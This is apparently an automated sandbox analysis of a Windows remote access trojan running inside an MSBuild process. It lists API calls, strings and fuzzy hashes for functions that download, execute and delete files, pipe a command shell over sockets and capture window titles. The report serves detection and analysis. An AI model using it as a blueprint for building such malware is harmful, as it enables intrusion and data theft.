                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3919263394-0
                                                                                                                                            • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                                            • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                                                            • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                                            • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountEventTick
                                                                                                                                            • String ID: >G
                                                                                                                                            • API String ID: 180926312-1296849874
                                                                                                                                            • Opcode ID: 094a325683d6b30a43efbfda0b7386eed36104a737248fa31382aa0198ea447e
                                                                                                                                            • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                                                            • Opcode Fuzzy Hash: 094a325683d6b30a43efbfda0b7386eed36104a737248fa31382aa0198ea447e
                                                                                                                                            • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                                            • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                                                            • String ID: Rmc-QM0FWK
                                                                                                                                            • API String ID: 1925916568-4096834054
                                                                                                                                            • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                                                            • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                                            • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                                                            • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                            • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                                            • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                                            • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                                            • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                            • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                                                            • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                                                            • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                                                            • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                            • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                            • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                                            • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                            • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                            • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                            • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                                            • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                            • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID: xAG
• API String ID: 176396367-2759412365
• Opcode ID: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
• Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
• Opcode Fuzzy Hash: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
• Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
• Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
• Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
• Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
• Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
APIs
• _free.LIBCMT ref: 0044B9DF
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: AllocateHeap$_free
• String ID:
• API String ID: 1482568997-0
• Opcode ID: 4aeba00e3fff788b378028bf06d7bcfcb791a64fa1e6dc072cb532da7a87caba
• Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
• Opcode Fuzzy Hash: 4aeba00e3fff788b378028bf06d7bcfcb791a64fa1e6dc072cb532da7a87caba
• Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 00404212
  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
• Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
• Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
• Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
• Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
  • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
• __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID:
• API String ID: 3476068407-0
• Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
• Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
• Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
• Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
APIs
• GetForegroundWindow.USER32 ref: 0041AC74
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundText
• String ID:
• API String ID: 29597999-0
• Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
• Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
• Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
• Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
APIs
• VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
• Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
• Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
• Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
APIs
• RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
• Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
• Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
• Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
APIs
• WSAStartup.WS2_32(00000202,00000000), ref: 00404277
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
• Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
• Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
• Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
• Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
• Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
• Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
• Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Deallocate
• String ID:
• API String ID: 1075933841-0
• Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
• Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
• Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
• Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
APIs
• VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
• Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
• Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
• Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16
APIs
• SetEvent.KERNEL32(?,?), ref: 00406F28
• GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
• DeleteFileW.KERNEL32(00000000), ref: 00407018
  • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
  • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
  • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002C4,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(000002C4,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
• DeleteFileA.KERNEL32(?), ref: 004078CC
  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
• Sleep.KERNEL32(000007D0), ref: 00407976
• StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
  • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
• String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
• API String ID: 2918587301-599666313
• Opcode ID: b7a69f1bcbcf96e48006821f0f8484e4d196d563d615a55e7ff915e2f65eacdc
• Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
• Opcode Fuzzy Hash: b7a69f1bcbcf96e48006821f0f8484e4d196d563d615a55e7ff915e2f65eacdc
• Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
APIs
• __Init_thread_footer.LIBCMT ref: 0040508E
  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
• __Init_thread_footer.LIBCMT ref: 004050CB
• CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
• CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
• Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
• Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
• TerminateProcess.KERNEL32(00000000), ref: 004053C1
• CloseHandle.KERNEL32 ref: 004053CD
• CloseHandle.KERNEL32 ref: 004053D5
